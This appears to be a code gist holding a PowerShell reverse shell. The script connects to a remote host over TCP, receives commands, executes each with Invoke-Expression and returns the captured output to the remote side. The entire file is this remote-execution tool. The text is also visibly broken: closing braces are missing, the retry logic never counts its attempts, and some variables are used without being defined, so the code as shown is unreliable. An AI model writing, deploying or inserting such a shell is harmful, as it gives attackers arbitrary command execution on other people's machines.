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Created November 4, 2021 14:09
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using namespace System.Net.Sockets
$Encoder = [System.Text.Encoding]::UTF8
# FIXME: Currently ignoring endianess and assuming both machines are the same.
function Connect-Socket {
Param($HostName, $Port, $NRetries)
$CurrentTry = 0
while ($CurrentTry -lt $NRetries) {
try {
$Sock = New-Object TcpClient($HostName, $Port)
return $Sock
} catch [SocketException] {
Write-Host "Failed to connect ($($CurrentTry)/$($NRetries))"
return $null
function Read-NBytes {
Param($Stream, $NToRead)
$Buffer = [byte[]]::new($NToRead)
$NRead = 0
while ($NRead -lt $NToRead) {
$NRead += $Stream.Read($Buffer, $NRead, ($NToRead - $NRead))
#Write-Host "Read $NRead"
return $Buffer
function Start-CommandLoop {
$Stream = $Sock.GetStream()
while ($true) {
#Write-Host "Starting loop..."
$NToReadBytes = Read-NBytes $Stream $SIZE_BUFFER_SIZE # Read in how much to read
$NToRead = [System.BitConverter]::ToInt32($NToReadBytes, 0) # FIXME: Check to ensure non-null
$CommandBytes = Read-NBytes $Stream $NToRead
$Command = $Encoder.GetString($CommandBytes)
#Write-Host "Recieved command: $Command"
if ($Command -iin @("quit", "exit")) {
break # Handle connection breakages, as well as legitimate exits?
} elseif ($Command) {
try {
# FIXME: Wrapping $Command causing squeezing. Need because = has low precendence.
$OutputStr = Invoke-Expression "($Command) *>&1 | Out-String" # Execute, redirect all streams, and stringify output
} catch [System.SystemException] {
$OutputStr = $_.Exception.Message
$OutputStr += " " # Concatenating a single space because sending nothing is problematic
$OutputBytes = $Encoder.GetBytes($OutputStr)
Write-Host "Sending output. Length: $($OutputBytes.Length)"
$Stream.Write([System.BitConverter]::GetBytes($OutputBytes.Length), 0, $SIZE_BUFFER_SIZE) # Tell the client how much to read
$Stream.Write($OutputBytes, 0, $OutputBytes.Length)
} else {
Write-Host "Bad command read: $Command" # TODO: Get rid of
if ($Null -ne $Sock) {
try {
Start-CommandLoop $Sock
} catch [System.IO.IOException] {
Write-Host ""
} finally {
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